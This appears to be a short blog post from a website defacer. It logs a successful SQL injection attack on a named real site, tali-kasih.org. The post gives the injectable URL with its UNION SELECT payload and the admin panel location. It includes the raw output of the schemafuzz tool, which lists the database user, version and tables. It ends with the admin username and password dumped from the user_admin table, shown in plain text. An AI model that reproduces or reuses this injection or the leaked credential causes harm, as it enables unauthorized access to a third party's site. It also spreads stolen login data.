Tool --> [0] schemafuzz.py v5.0 [1] IntelliTamper v2.07
Admin loc --> http://www.tali-kasih.org/ytk_admin/cmspanel_ytk/
Admin usr/pwd --> novita:omegajesus
Dump:
[+] URL:http://www.tali-kasih.org/detail_berita.php?id=4+AND+1=2+UNION+SELECT+0,sqli,2,3,4--
[+] Evasion Used: "+" "--"
[+] 20:16:45
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: h45755_ytk
User: h45755_cliff@localhost
Version: 5.0.32-Debian_7etch6
[Database]: h45755_ytk
[Table: Columns]
[0]artikel: id,kode,judul,oleh,deskripsi
[1]berita: id,tanggal,judul,ringkasan,deskripsi
[2]user_admin: id,user_id,password
[-] [20:16:52]
[-] Total URL Requests 15
[-] Done
[+] URL:http://www.tali-kasih.org/detail_berita.php?id=4+AND+1=2+UNION+SELECT+0,sqli,2,3,4--
[+] Evasion Used: "+" "--"
[+] 20:18:46
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: h45755_ytk
User: h45755_cliff@localhost
Version: 5.0.32-Debian_7etch6
[+] Dumping data from database "h45755_ytk" Table "user_admin"
[+] Column(s) ['user_id', 'password']
[+] Number of Rows: 1
[0] novita:omegajesus:
[-] [20:18:47]
[-] Total URL Requests 3
[-] Done
0 comments:
Post a Comment